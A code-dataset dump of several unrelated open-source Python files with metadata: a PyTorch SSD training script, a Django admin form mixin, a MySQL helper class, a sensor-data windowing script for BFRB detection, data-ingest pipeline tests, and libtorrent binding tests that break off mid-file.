drop_last=drop_last)
val_dataset = VOC2012DataSet(VOC_root, data_transform['val'], train_set='val.txt')
val_data_loader = torch.utils.data.DataLoader(val_dataset,
batch_size=batch_size,
shuffle=False,
num_workers=nw,
collate_fn=train_dataset.collate_fn)
model = create_model(num_classes=args.num_classes+1, device=device)
# define optimizer
params = [p for p in model.parameters() if p.requires_grad]
optimizer = torch.optim.SGD(params, lr=0.0005,
momentum=0.9, weight_decay=0.0005)
# learning rate scheduler
lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer,
step_size=5,
gamma=0.3)
# 如果指定了上次训练保存的权重文件地址,则接着上次结果接着训练
if parser_data.resume != "":
checkpoint = torch.load(parser_data.resume)
model.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])
parser_data.start_epoch = checkpoint['epoch'] + 1
print("the training process from epoch{}...".format(parser_data.start_epoch))
train_loss = []
learning_rate = []
val_map = []
# 提前加载验证集数据,以免每次验证时都要重新加载一次数据,节省时间
val_data = get_coco_api_from_dataset(val_data_loader.dataset)
for epoch in range(parser_data.start_epoch, parser_data.epochs):
mean_loss, lr = utils.train_one_epoch(model=model, optimizer=optimizer,
data_loader=train_data_loader,
device=device, epoch=epoch,
print_freq=50)
train_loss.append(mean_loss.item())
learning_rate.append(lr)
# update learning rate
lr_scheduler.step()
coco_info = utils.evaluate(model=model, data_loader=val_data_loader,
device=device, data_set=val_data)
# write into txt
with open(results_file, "a") as f:
# 写入的数据包括coco指标还有loss和learning rate
result_info = [str(round(i, 4)) for i in coco_info + [mean_loss.item()]] + [str(round(lr, 6))]
txt = "epoch:{} {}".format(epoch, ' '.join(result_info))
f.write(txt + "\n")
val_map.append(coco_info[1]) # pascal mAP
# save weights
save_files = {
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
'lr_scheduler': lr_scheduler.state_dict(),
'epoch': epoch}
torch.save(save_files, "./save_weights/ssd300-{}.pth".format(epoch))
# plot loss and lr curve
if len(train_loss) != 0 and len(learning_rate) != 0:
from plot_curve import plot_loss_and_lr
plot_loss_and_lr(train_loss, learning_rate)
# plot mAP curve
if len(val_map) != 0:
from plot_curve import plot_map
plot_map(val_map)
# inputs = torch.rand(size=(2, 3, 300, 300))
# output = model(inputs)
# print(output)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description=__doc__)
# 训练设备类型
parser.add_argument('--device', default='cuda:0', help='device')
# 检测的目标类别个数,不包括背景
parser.add_argument('--num_classes', default=20, type=int, help='num_classes')
# 训练数据集的根目录(VOCdevkit)
parser.add_argument('--data-path', default='./', help='dataset')
# 文件保存地址
parser.add_argument('--output-dir', default='./save_weights', help='path where to save')
# 若需要接着上次训练,则指定上次训练保存权重文件地址
parser.add_argument('--resume', default='', type=str, help='resume from checkpoint')
# 指定接着从哪个epoch数开始训练
parser.add_argument('--start_epoch', default=0, type=int, help='start epoch')
# 训练的总epoch数
parser.add_argument('--epochs', default=15, type=int, metavar='N',
help='number of total epochs to run')
# 训练的batch size
parser.add_argument('--batch_size', default=4, type=int, metavar='N',
help='batch size when training.')
args = parser.parse_args()
print(args)
# 检查保存权重文件夹是否存在,不存在则创建
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
main(args)
|
zh
| 0.464735
|
# https://download.pytorch.org/models/resnet50-19c8e357.pth # pre_train_path = "./src/resnet50.pth" # https://ngc.nvidia.com/catalog/models -> search ssd -> download FP32 # 删除类别预测器权重,注意,回归预测器的权重可以重用,因为不涉及num_classes # check voc root # 注意训练时,batch_size必须大于1 # 防止最后一个batch_size=1,如果最后一个batch_size=1就舍去 # number of workers # define optimizer # learning rate scheduler # 如果指定了上次训练保存的权重文件地址,则接着上次结果接着训练 # 提前加载验证集数据,以免每次验证时都要重新加载一次数据,节省时间 # update learning rate # write into txt # 写入的数据包括coco指标还有loss和learning rate # pascal mAP # save weights # plot loss and lr curve # plot mAP curve # inputs = torch.rand(size=(2, 3, 300, 300)) # output = model(inputs) # print(output) # 训练设备类型 # 检测的目标类别个数,不包括背景 # 训练数据集的根目录(VOCdevkit) # 文件保存地址 # 若需要接着上次训练,则指定上次训练保存权重文件地址 # 指定接着从哪个epoch数开始训练 # 训练的总epoch数 # 训练的batch size # 检查保存权重文件夹是否存在,不存在则创建
| 2.445689
| 2
|
shop/admin/mixins.py
|
dwx9/test
| 1
|
6627616
|
<filename>shop/admin/mixins.py<gh_stars>1-10
#-*- coding: utf-8 -*-
from django import forms
class LocalizeDecimalFieldsForm(forms.ModelForm):
def __new__(cls, *args, **kwargs):
new_class = super(LocalizeDecimalFieldsForm, cls).__new__(cls)
if hasattr(new_class, 'base_fields'):
for field in new_class.base_fields.values():
if isinstance(field, (forms.DecimalField, forms.FloatField)):
field.localize = True
field.widget.is_localized = True
return new_class
class LocalizeDecimalFieldsMixin(object):
'''
To be used as a mixin for classes derived from admin.ModelAdmin,
admin.TabularInline, etc. which localizes the input fields for models
of type DecimalField in the admin interface.
If your class derived from ModelAdmin wants to override the form attribute,
make sure that this form is derived from LocalizeDecimalFieldsForm and not
from forms.ModelForm.
'''
form = LocalizeDecimalFieldsForm
|
<filename>shop/admin/mixins.py<gh_stars>1-10
#-*- coding: utf-8 -*-
from django import forms
class LocalizeDecimalFieldsForm(forms.ModelForm):
def __new__(cls, *args, **kwargs):
new_class = super(LocalizeDecimalFieldsForm, cls).__new__(cls)
if hasattr(new_class, 'base_fields'):
for field in new_class.base_fields.values():
if isinstance(field, (forms.DecimalField, forms.FloatField)):
field.localize = True
field.widget.is_localized = True
return new_class
class LocalizeDecimalFieldsMixin(object):
'''
To be used as a mixin for classes derived from admin.ModelAdmin,
admin.TabularInline, etc. which localizes the input fields for models
of type DecimalField in the admin interface.
If your class derived from ModelAdmin wants to override the form attribute,
make sure that this form is derived from LocalizeDecimalFieldsForm and not
from forms.ModelForm.
'''
form = LocalizeDecimalFieldsForm
|
en
| 0.886119
|
#-*- coding: utf-8 -*- To be used as a mixin for classes derived from admin.ModelAdmin, admin.TabularInline, etc. which localizes the input fields for models of type DecimalField in the admin interface. If your class derived from ModelAdmin wants to override the form attribute, make sure that this form is derived from LocalizeDecimalFieldsForm and not from forms.ModelForm.
| 2.039436
| 2
|
dbutil/dbutil.py
|
Dannywanxyz/aladin
| 0
|
6627617
|
<gh_stars>0
#!/usr/bin/env python
#encoding:utf8
import json
import time,random
import datetime
import MySQLdb
import MySQLdb.cursors
class DB:
conn = None
db = None
host = None
def __init__(self, host, mysql_user, mysql_pass, mysql_db):
self.host = host
self.mysql_user = mysql_user
self.mysql_pass = <PASSWORD>
self.mysql_db = mysql_db
def connect(self):
self.conn = MySQLdb.connect(host=self.host, user=self.mysql_user, passwd=self.mysql_pass, db=self.mysql_db, charset="utf8", connect_timeout=600, compress=True,cursorclass = MySQLdb.cursors.DictCursor)
self.conn.autocommit(True)
def execute(self, sql):
global cursor
try:
cursor = self.conn.cursor()
cursor.execute(sql)
except (AttributeError, MySQLdb.OperationalError):
try:
cursor.close()
self.conn.close()
except:
pass
time.sleep(1)
try:
self.connect()
print "reconnect DB"
cursor = self.conn.cursor()
cursor.execute(sql)
except (AttributeError, MySQLdb.OperationalError):
time.sleep(2)
self.connect()
print "reconnect DB"
cursor = self.conn.cursor()
cursor.execute(sql)
return cursor
|
#!/usr/bin/env python
#encoding:utf8
import json
import time,random
import datetime
import MySQLdb
import MySQLdb.cursors
class DB:
conn = None
db = None
host = None
def __init__(self, host, mysql_user, mysql_pass, mysql_db):
self.host = host
self.mysql_user = mysql_user
self.mysql_pass = <PASSWORD>
self.mysql_db = mysql_db
def connect(self):
self.conn = MySQLdb.connect(host=self.host, user=self.mysql_user, passwd=self.mysql_pass, db=self.mysql_db, charset="utf8", connect_timeout=600, compress=True,cursorclass = MySQLdb.cursors.DictCursor)
self.conn.autocommit(True)
def execute(self, sql):
global cursor
try:
cursor = self.conn.cursor()
cursor.execute(sql)
except (AttributeError, MySQLdb.OperationalError):
try:
cursor.close()
self.conn.close()
except:
pass
time.sleep(1)
try:
self.connect()
print "reconnect DB"
cursor = self.conn.cursor()
cursor.execute(sql)
except (AttributeError, MySQLdb.OperationalError):
time.sleep(2)
self.connect()
print "reconnect DB"
cursor = self.conn.cursor()
cursor.execute(sql)
return cursor
|
en
| 0.137559
|
#!/usr/bin/env python #encoding:utf8
| 2.946452
| 3
|
BFRB_Detection_Data/pipeline/1-_WindowSplit.py
|
Bhorda/BFRBAnticipationDataset
| 3
|
6627618
|
<reponame>Bhorda/BFRBAnticipationDataset
import numpy as np
import pandas as ps
import math
import sys
import random
### Negative windows
# prediction window and labeled window length in seconds
directory = sys.argv[1]
xSize = int(sys.argv[2]) # xwindow size
ySize = int(sys.argv[3]) # ywindow size
uID = sys.argv[4] # participant ID
norm = sys.argv[5] # normalisation type: zscore/minmax
timecodes = ps.read_csv(directory + 'timestamps.csv')
startRecording = int(timecodes['start'][0])
endRecording = int(timecodes['end'][0])
listStart = timecodes['start'][1:].tolist()
listEnd = timecodes['end'][1:].tolist()
listHand = timecodes['hand'][1:].tolist()
listLabel = timecodes['label'][1:].tolist()
listStage = timecodes['stage'][1:].tolist()
for i in range(0,len(listStart)):
listStart[i] = int(startRecording + math.floor(listStart[i])*60*1000 + (listStart[i] - math.floor(listStart[i]))*100*1000)
listEnd[i] = int(startRecording + math.floor(listEnd[i])*60*1000 + (listEnd[i] - math.floor(listEnd[i]))*100*1000)
dfTimestamps = ps.DataFrame(list(zip(listStart,listEnd,listHand,listLabel,listStage)), columns=['start','end','hand','label','stage'])
dfTimestamps = dfTimestamps.replace(np.nan,'',regex=True)
dfTimestamps = dfTimestamps.loc[(dfTimestamps['label'] != '')]
def GenerateNegativeWindows():
sensorDataAcc = ps.read_csv(directory + f'acc{norm}.csv')
sensorDataGyr = ps.read_csv(directory + f'gyr{norm}.csv')
sensorDataHrm = ps.read_csv(directory + f'hrm{norm}.csv')
sensorDataPpg = ps.read_csv(directory + 'ppgLabeled.csv') # ppg processed separately
window = ps.DataFrame()
for i in range(0,len(dfTimestamps)):
check = True
wIndex = i + 1
while check:
mark = random.randrange(startRecording/1000,endRecording/1000,1) * 1000
# print(mark)
if mark < startRecording + xSize * 1000:
continue
for j in dfTimestamps.itertuples():
if mark > j[1] and mark < j[2]:
# print('during behaviour period ' + str(wIndex) + ' ')
break
elif mark + ySize * 1000 > j[1] and mark + ySize * 1000 < j[2]:
# print('behaviour overlap ' + str(wIndex) + ' ' + str(j[1]))
break
check = False
window = sensorDataAcc.loc[(sensorDataAcc['timestamp'] >= mark - xSize * 1000) & (sensorDataAcc['timestamp'] <= mark + ySize * 1000)]
window.drop('hand',axis=1,inplace=True)
window.to_csv(f'{directory}windows/{uID}_acc_-_{wIndex}.csv', index=False)
# print('acc windows generated')
window = sensorDataGyr.loc[(sensorDataGyr['timestamp'] >= mark - xSize * 1000) & (sensorDataGyr['timestamp'] <= mark + ySize * 1000)]
window.drop('hand',axis=1,inplace=True)
window.to_csv(f'{directory}windows/{uID}_gyr_-_{wIndex}.csv', index=False)
# print('gyr windows generated')
window = sensorDataHrm.loc[(sensorDataHrm['timestamp'] >= mark - xSize * 1000) & (sensorDataHrm['timestamp'] <= mark + ySize * 1000)]
window.drop('hand',axis=1,inplace=True)
window.to_csv(f'{directory}windows/{uID}_hrm_-_{wIndex}.csv', index=False)
# print('hrm windows generated')
# window = sensorDataPpg.loc[(sensorDataPpg['timestamp'] >= mark - xSize * 1000) & (sensorDataPpg['timestamp'] <= mark + ySize * 1000)]
# window.drop('hand',axis=1,inplace=True)
# window.to_csv(f'{directory}windows/P{uID}_ppg_{wIndex}_-_.csv', index=False)
GenerateNegativeWindows()
# # generate positive and negative windows of length
# def GeneratePositiveWindows(sensorType):
# sensorData = ps.read_csv(directory + sensorType + 'Labeled.csv')
# window = ps.DataFrame()
# wIndex = 1
# lastTuple = (listStart[0],listEnd[0])
# for i in dfTimestamps.itertuples():
# if i[1] - xSize * 1000 < startRecording or i[4] == -1:
# continue
# # If behaviour not as long as y window
# # if i[2]-i[1] < ySize * 1000:
# # continue
# window = sensorData.loc[(sensorData['timestamp'] >= i[1] - xSize * 1000) & (sensorData['timestamp'] <= i[2] + ySize * 1000)]
# print(i)
# if i[1] - lastTuple[1] > xSize * 1000:
# # window.to_csv(directory + sensorType + 'Window' + '_' + str(wIndex) + '_' + str(i[4]) + '_clean' + '.csv', index=False)
# window.to_csv(f'{directory}{sensorType}Window_{wIndex}_{i[4]}_clean.csv', index=False)
# else:
# # window.to_csv(directory + sensorType + 'Window' + '_' + str(wIndex) + '_' + str(i[4]) + '_dirty' + '.csv', index=False)
# window.to_csv(f'{directory}{sensorType}Window_{wIndex}_{i[4]}_dirty.csv', index=False)
# wIndex += 1
# # f'Window_{wIndex}_{i[4]}_clean.csv'
# GeneratePositiveWindows('acc')
|
import numpy as np
import pandas as ps
import math
import sys
import random
### Negative windows
# prediction window and labeled window length in seconds
directory = sys.argv[1]
xSize = int(sys.argv[2]) # xwindow size
ySize = int(sys.argv[3]) # ywindow size
uID = sys.argv[4] # participant ID
norm = sys.argv[5] # normalisation type: zscore/minmax
timecodes = ps.read_csv(directory + 'timestamps.csv')
startRecording = int(timecodes['start'][0])
endRecording = int(timecodes['end'][0])
listStart = timecodes['start'][1:].tolist()
listEnd = timecodes['end'][1:].tolist()
listHand = timecodes['hand'][1:].tolist()
listLabel = timecodes['label'][1:].tolist()
listStage = timecodes['stage'][1:].tolist()
for i in range(0,len(listStart)):
listStart[i] = int(startRecording + math.floor(listStart[i])*60*1000 + (listStart[i] - math.floor(listStart[i]))*100*1000)
listEnd[i] = int(startRecording + math.floor(listEnd[i])*60*1000 + (listEnd[i] - math.floor(listEnd[i]))*100*1000)
dfTimestamps = ps.DataFrame(list(zip(listStart,listEnd,listHand,listLabel,listStage)), columns=['start','end','hand','label','stage'])
dfTimestamps = dfTimestamps.replace(np.nan,'',regex=True)
dfTimestamps = dfTimestamps.loc[(dfTimestamps['label'] != '')]
def GenerateNegativeWindows():
sensorDataAcc = ps.read_csv(directory + f'acc{norm}.csv')
sensorDataGyr = ps.read_csv(directory + f'gyr{norm}.csv')
sensorDataHrm = ps.read_csv(directory + f'hrm{norm}.csv')
sensorDataPpg = ps.read_csv(directory + 'ppgLabeled.csv') # ppg processed separately
window = ps.DataFrame()
for i in range(0,len(dfTimestamps)):
check = True
wIndex = i + 1
while check:
mark = random.randrange(startRecording/1000,endRecording/1000,1) * 1000
# print(mark)
if mark < startRecording + xSize * 1000:
continue
for j in dfTimestamps.itertuples():
if mark > j[1] and mark < j[2]:
# print('during behaviour period ' + str(wIndex) + ' ')
break
elif mark + ySize * 1000 > j[1] and mark + ySize * 1000 < j[2]:
# print('behaviour overlap ' + str(wIndex) + ' ' + str(j[1]))
break
check = False
window = sensorDataAcc.loc[(sensorDataAcc['timestamp'] >= mark - xSize * 1000) & (sensorDataAcc['timestamp'] <= mark + ySize * 1000)]
window.drop('hand',axis=1,inplace=True)
window.to_csv(f'{directory}windows/{uID}_acc_-_{wIndex}.csv', index=False)
# print('acc windows generated')
window = sensorDataGyr.loc[(sensorDataGyr['timestamp'] >= mark - xSize * 1000) & (sensorDataGyr['timestamp'] <= mark + ySize * 1000)]
window.drop('hand',axis=1,inplace=True)
window.to_csv(f'{directory}windows/{uID}_gyr_-_{wIndex}.csv', index=False)
# print('gyr windows generated')
window = sensorDataHrm.loc[(sensorDataHrm['timestamp'] >= mark - xSize * 1000) & (sensorDataHrm['timestamp'] <= mark + ySize * 1000)]
window.drop('hand',axis=1,inplace=True)
window.to_csv(f'{directory}windows/{uID}_hrm_-_{wIndex}.csv', index=False)
# print('hrm windows generated')
# window = sensorDataPpg.loc[(sensorDataPpg['timestamp'] >= mark - xSize * 1000) & (sensorDataPpg['timestamp'] <= mark + ySize * 1000)]
# window.drop('hand',axis=1,inplace=True)
# window.to_csv(f'{directory}windows/P{uID}_ppg_{wIndex}_-_.csv', index=False)
GenerateNegativeWindows()
# # generate positive and negative windows of length
# def GeneratePositiveWindows(sensorType):
# sensorData = ps.read_csv(directory + sensorType + 'Labeled.csv')
# window = ps.DataFrame()
# wIndex = 1
# lastTuple = (listStart[0],listEnd[0])
# for i in dfTimestamps.itertuples():
# if i[1] - xSize * 1000 < startRecording or i[4] == -1:
# continue
# # If behaviour not as long as y window
# # if i[2]-i[1] < ySize * 1000:
# # continue
# window = sensorData.loc[(sensorData['timestamp'] >= i[1] - xSize * 1000) & (sensorData['timestamp'] <= i[2] + ySize * 1000)]
# print(i)
# if i[1] - lastTuple[1] > xSize * 1000:
# # window.to_csv(directory + sensorType + 'Window' + '_' + str(wIndex) + '_' + str(i[4]) + '_clean' + '.csv', index=False)
# window.to_csv(f'{directory}{sensorType}Window_{wIndex}_{i[4]}_clean.csv', index=False)
# else:
# # window.to_csv(directory + sensorType + 'Window' + '_' + str(wIndex) + '_' + str(i[4]) + '_dirty' + '.csv', index=False)
# window.to_csv(f'{directory}{sensorType}Window_{wIndex}_{i[4]}_dirty.csv', index=False)
# wIndex += 1
# # f'Window_{wIndex}_{i[4]}_clean.csv'
# GeneratePositiveWindows('acc')
|
en
| 0.370915
|
### Negative windows # prediction window and labeled window length in seconds # xwindow size # ywindow size # participant ID # normalisation type: zscore/minmax # ppg processed separately # print(mark) # print('during behaviour period ' + str(wIndex) + ' ') # print('behaviour overlap ' + str(wIndex) + ' ' + str(j[1])) # print('acc windows generated') # print('gyr windows generated') # print('hrm windows generated') # window = sensorDataPpg.loc[(sensorDataPpg['timestamp'] >= mark - xSize * 1000) & (sensorDataPpg['timestamp'] <= mark + ySize * 1000)] # window.drop('hand',axis=1,inplace=True) # window.to_csv(f'{directory}windows/P{uID}_ppg_{wIndex}_-_.csv', index=False) # # generate positive and negative windows of length # def GeneratePositiveWindows(sensorType): # sensorData = ps.read_csv(directory + sensorType + 'Labeled.csv') # window = ps.DataFrame() # wIndex = 1 # lastTuple = (listStart[0],listEnd[0]) # for i in dfTimestamps.itertuples(): # if i[1] - xSize * 1000 < startRecording or i[4] == -1: # continue # # If behaviour not as long as y window # # if i[2]-i[1] < ySize * 1000: # # continue # window = sensorData.loc[(sensorData['timestamp'] >= i[1] - xSize * 1000) & (sensorData['timestamp'] <= i[2] + ySize * 1000)] # print(i) # if i[1] - lastTuple[1] > xSize * 1000: # # window.to_csv(directory + sensorType + 'Window' + '_' + str(wIndex) + '_' + str(i[4]) + '_clean' + '.csv', index=False) # window.to_csv(f'{directory}{sensorType}Window_{wIndex}_{i[4]}_clean.csv', index=False) # else: # # window.to_csv(directory + sensorType + 'Window' + '_' + str(wIndex) + '_' + str(i[4]) + '_dirty' + '.csv', index=False) # window.to_csv(f'{directory}{sensorType}Window_{wIndex}_{i[4]}_dirty.csv', index=False) # wIndex += 1 # # f'Window_{wIndex}_{i[4]}_clean.csv' # GeneratePositiveWindows('acc')
| 2.314624
| 2
|
tests/test_load_stage.py
|
kids-first/kf-lib-data-ingest
| 3
|
6627619
|
<reponame>kids-first/kf-lib-data-ingest
import os
import pytest
from click.testing import CliRunner
from pandas import DataFrame
from conftest import KIDS_FIRST_CONFIG, TEST_INGEST_CONFIG
from kf_lib_data_ingest.app import cli
from kf_lib_data_ingest.common.errors import InvalidIngestStageParameters
from kf_lib_data_ingest.etl.configuration.base_config import (
ConfigValidationError,
)
from kf_lib_data_ingest.etl.load.load_shim import LoadStage
@pytest.fixture(scope="function")
def load_stage(tmpdir):
return LoadStage(
KIDS_FIRST_CONFIG,
"http://URL_A",
[],
"FAKE_STUDY_A",
cache_dir=tmpdir,
dry_run=True,
)
@pytest.mark.parametrize(
"run_input",
[
("foo"),
({"foo": "bar"}),
({"participant": "foo"}),
({"participant": ["foo"]}),
],
)
def test_invalid_run_parameters(load_stage, caplog, run_input):
"""
Test running transform with invalid run params
"""
with pytest.raises(InvalidIngestStageParameters):
load_stage.run(run_input)
def test_uid_cache(tmpdir):
a1 = LoadStage(
KIDS_FIRST_CONFIG,
"http://URL_A",
[],
"FAKE_STUDY_A",
cache_dir=tmpdir,
dry_run=True,
)
a2 = LoadStage(
KIDS_FIRST_CONFIG,
"http://URL_A",
[],
"FAKE_STUDY_A",
cache_dir=tmpdir,
dry_run=True,
)
assert os.path.exists(a1.uid_cache_filepath)
a1._store_target_id_for_key(
"entity_type", "entity_unique_key", "target_id", True
)
assert (
a1._get_target_id_from_key("entity_type", "entity_unique_key")
== "target_id"
)
assert os.path.exists(a2.uid_cache_filepath)
a2._store_target_id_for_key(
"entity_type", "entity_unique_key", "target_id", True
)
assert (
a2._get_target_id_from_key("entity_type", "entity_unique_key")
== "target_id"
)
assert a1.uid_cache_filepath == a2.uid_cache_filepath
b1 = LoadStage(
KIDS_FIRST_CONFIG,
"http://URL_B1",
[],
"FAKE_STUDY_B",
cache_dir=tmpdir,
dry_run=True,
)
b2 = LoadStage(
KIDS_FIRST_CONFIG,
"URL_B2",
[],
"FAKE_STUDY_B",
cache_dir=tmpdir,
dry_run=True,
)
assert "URL_B2" in b2.uid_cache_filepath
assert "URL_B1" in b1.uid_cache_filepath
assert os.path.exists(b1.uid_cache_filepath)
assert os.path.exists(b2.uid_cache_filepath)
b1._store_target_id_for_key(
"entity type", "entity unique key", "target_id", True
)
assert (
b1._get_target_id_from_key("entity type", "entity unique key")
== "target_id"
)
b2._store_target_id_for_key(
"entity type", "entity_unique_key", "target id", True
)
assert (
b2._get_target_id_from_key("entity type", "entity_unique_key")
== "target id"
)
assert b1.uid_cache_filepath != a1.uid_cache_filepath
assert b1.uid_cache_filepath != b2.uid_cache_filepath
def test_ingest_load_async_error():
"""
Test that async loading exits when threads raise exceptions
"""
prev_environ = os.environ.get("MAX_RETRIES_ON_CONN_ERROR")
os.environ["MAX_RETRIES_ON_CONN_ERROR"] = "0"
runner = CliRunner()
result = runner.invoke(
cli.ingest,
[TEST_INGEST_CONFIG, "--use_async", "--target_url", "http://potato"],
)
assert result.exit_code == 1
if prev_environ:
os.environ["MAX_RETRIES_ON_CONN_ERROR"] = prev_environ
else:
del os.environ["MAX_RETRIES_ON_CONN_ERROR"]
@pytest.mark.parametrize(
"ret_val, error",
[
(None, InvalidIngestStageParameters),
("foo", InvalidIngestStageParameters),
({"foo": DataFrame()}, ConfigValidationError),
(
{
"foo": DataFrame(),
"participant": DataFrame(),
"default": DataFrame(),
},
ConfigValidationError,
),
({"default": DataFrame()}, None),
({"participant": DataFrame()}, None),
],
)
def test_bad_ret_vals_transform_funct(ret_val, error, load_stage):
"""
Test input validation
"""
if error:
with pytest.raises(error):
load_stage._validate_run_parameters(ret_val)
else:
load_stage._validate_run_parameters(ret_val)
|
import os
import pytest
from click.testing import CliRunner
from pandas import DataFrame
from conftest import KIDS_FIRST_CONFIG, TEST_INGEST_CONFIG
from kf_lib_data_ingest.app import cli
from kf_lib_data_ingest.common.errors import InvalidIngestStageParameters
from kf_lib_data_ingest.etl.configuration.base_config import (
ConfigValidationError,
)
from kf_lib_data_ingest.etl.load.load_shim import LoadStage
@pytest.fixture(scope="function")
def load_stage(tmpdir):
return LoadStage(
KIDS_FIRST_CONFIG,
"http://URL_A",
[],
"FAKE_STUDY_A",
cache_dir=tmpdir,
dry_run=True,
)
@pytest.mark.parametrize(
"run_input",
[
("foo"),
({"foo": "bar"}),
({"participant": "foo"}),
({"participant": ["foo"]}),
],
)
def test_invalid_run_parameters(load_stage, caplog, run_input):
"""
Test running transform with invalid run params
"""
with pytest.raises(InvalidIngestStageParameters):
load_stage.run(run_input)
def test_uid_cache(tmpdir):
a1 = LoadStage(
KIDS_FIRST_CONFIG,
"http://URL_A",
[],
"FAKE_STUDY_A",
cache_dir=tmpdir,
dry_run=True,
)
a2 = LoadStage(
KIDS_FIRST_CONFIG,
"http://URL_A",
[],
"FAKE_STUDY_A",
cache_dir=tmpdir,
dry_run=True,
)
assert os.path.exists(a1.uid_cache_filepath)
a1._store_target_id_for_key(
"entity_type", "entity_unique_key", "target_id", True
)
assert (
a1._get_target_id_from_key("entity_type", "entity_unique_key")
== "target_id"
)
assert os.path.exists(a2.uid_cache_filepath)
a2._store_target_id_for_key(
"entity_type", "entity_unique_key", "target_id", True
)
assert (
a2._get_target_id_from_key("entity_type", "entity_unique_key")
== "target_id"
)
assert a1.uid_cache_filepath == a2.uid_cache_filepath
b1 = LoadStage(
KIDS_FIRST_CONFIG,
"http://URL_B1",
[],
"FAKE_STUDY_B",
cache_dir=tmpdir,
dry_run=True,
)
b2 = LoadStage(
KIDS_FIRST_CONFIG,
"URL_B2",
[],
"FAKE_STUDY_B",
cache_dir=tmpdir,
dry_run=True,
)
assert "URL_B2" in b2.uid_cache_filepath
assert "URL_B1" in b1.uid_cache_filepath
assert os.path.exists(b1.uid_cache_filepath)
assert os.path.exists(b2.uid_cache_filepath)
b1._store_target_id_for_key(
"entity type", "entity unique key", "target_id", True
)
assert (
b1._get_target_id_from_key("entity type", "entity unique key")
== "target_id"
)
b2._store_target_id_for_key(
"entity type", "entity_unique_key", "target id", True
)
assert (
b2._get_target_id_from_key("entity type", "entity_unique_key")
== "target id"
)
assert b1.uid_cache_filepath != a1.uid_cache_filepath
assert b1.uid_cache_filepath != b2.uid_cache_filepath
def test_ingest_load_async_error():
"""
Test that async loading exits when threads raise exceptions
"""
prev_environ = os.environ.get("MAX_RETRIES_ON_CONN_ERROR")
os.environ["MAX_RETRIES_ON_CONN_ERROR"] = "0"
runner = CliRunner()
result = runner.invoke(
cli.ingest,
[TEST_INGEST_CONFIG, "--use_async", "--target_url", "http://potato"],
)
assert result.exit_code == 1
if prev_environ:
os.environ["MAX_RETRIES_ON_CONN_ERROR"] = prev_environ
else:
del os.environ["MAX_RETRIES_ON_CONN_ERROR"]
@pytest.mark.parametrize(
"ret_val, error",
[
(None, InvalidIngestStageParameters),
("foo", InvalidIngestStageParameters),
({"foo": DataFrame()}, ConfigValidationError),
(
{
"foo": DataFrame(),
"participant": DataFrame(),
"default": DataFrame(),
},
ConfigValidationError,
),
({"default": DataFrame()}, None),
({"participant": DataFrame()}, None),
],
)
def test_bad_ret_vals_transform_funct(ret_val, error, load_stage):
"""
Test input validation
"""
if error:
with pytest.raises(error):
load_stage._validate_run_parameters(ret_val)
else:
load_stage._validate_run_parameters(ret_val)
|
en
| 0.65664
|
Test running transform with invalid run params Test that async loading exits when threads raise exceptions Test input validation
| 1.986447
| 2
|
src/3rdparty/torrent-rasterbar/bindings/python/test.py
|
adem4ik/LIII
| 664
|
6627620
|
#!/usr/bin/env python
import libtorrent as lt
import unittest
import time
import os
import shutil
import binascii
import inspect
import pickle
class test_create_torrent(unittest.TestCase):
def test_from_torrent_info(self):
ti = lt.torrent_info('unordered.torrent')
ct = lt.create_torrent(ti, True)
entry = ct.generate()
content = lt.bencode(entry).strip()
with open('unordered.torrent', 'rb') as f:
file_content = bytearray(f.read().strip())
print(content)
print(file_content)
print(entry)
self.assertEqual(content, file_content)
class test_session_stats(unittest.TestCase):
def test_unique(self):
l = lt.session_stats_metrics()
self.assertTrue(len(l) > 40);
idx = set()
for m in l:
self.assertTrue(m.value_index not in idx)
idx.add(m.value_index)
def test_find_idx(self):
self.assertEqual(lt.find_metric_idx("peer.error_peers"), 0)
class test_torrent_handle(unittest.TestCase):
def setup(self):
self.ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
self.ti = lt.torrent_info('url_seed_multi.torrent');
self.h = self.ses.add_torrent({'ti': self.ti, 'save_path': os.getcwd()})
def test_torrent_handle(self):
self.setup()
self.assertEqual(self.h.file_priorities(), [4,4])
self.assertEqual(self.h.piece_priorities(), [4])
self.h.prioritize_files([0,1])
self.assertEqual(self.h.file_priorities(), [0,1])
self.h.prioritize_pieces([0])
self.assertEqual(self.h.piece_priorities(), [0])
# also test the overload that takes a list of piece->priority mappings
self.h.prioritize_pieces([(0, 1)])
self.assertEqual(self.h.piece_priorities(), [1])
def test_torrent_handle_in_set(self):
self.setup()
torrents = set()
torrents.add(self.h)
# get another instance of a torrent_handle that represents the same
# torrent. Make sure that when we add it to a set, it just replaces the
# existing object
t = self.ses.get_torrents()
self.assertEqual(len(t), 1)
for h in t:
torrents.add(h)
self.assertEqual(len(torrents), 1)
def test_torrent_handle_in_dict(self):
self.setup()
torrents = {}
torrents[self.h] = 'foo'
# get another instance of a torrent_handle that represents the same
# torrent. Make sure that when we add it to a dict, it just replaces the
# existing object
t = self.ses.get_torrents()
self.assertEqual(len(t), 1)
for h in t:
torrents[h] = 'bar'
self.assertEqual(len(torrents), 1)
self.assertEqual(torrents[self.h], 'bar')
def test_replace_trackers(self):
self.setup()
trackers = []
for idx, tracker_url in enumerate(('udp://tracker1.com', 'udp://tracker2.com')):
tracker = lt.announce_entry(tracker_url)
tracker.tier = idx
tracker.fail_limit = 2
trackers.append(tracker)
self.h.replace_trackers(trackers)
new_trackers = self.h.trackers()
self.assertEqual(new_trackers[0]['url'], 'udp://tracker1.com')
self.assertEqual(new_trackers[1]['tier'], 1)
self.assertEqual(new_trackers[1]['fail_limit'], 2)
def test_pickle_trackers(self):
"""Test lt objects convertors are working and trackers can be pickled"""
self.setup()
tracker = lt.announce_entry('udp://tracker1.com')
tracker.tier = 0
tracker.fail_limit = 1
trackers = [tracker]
self.h.replace_trackers(trackers)
tracker_list = [tracker for tracker in self.h.trackers()]
pickled_trackers = pickle.dumps(tracker_list)
unpickled_trackers = pickle.loads(pickled_trackers)
self.assertEqual(unpickled_trackers[0]['url'], 'udp://tracker1.com')
self.assertEqual(unpickled_trackers[0]['last_error']['value'], 0)
def test_file_status(self):
self.setup()
l = self.h.file_status()
print(l)
def test_piece_deadlines(self):
self.setup()
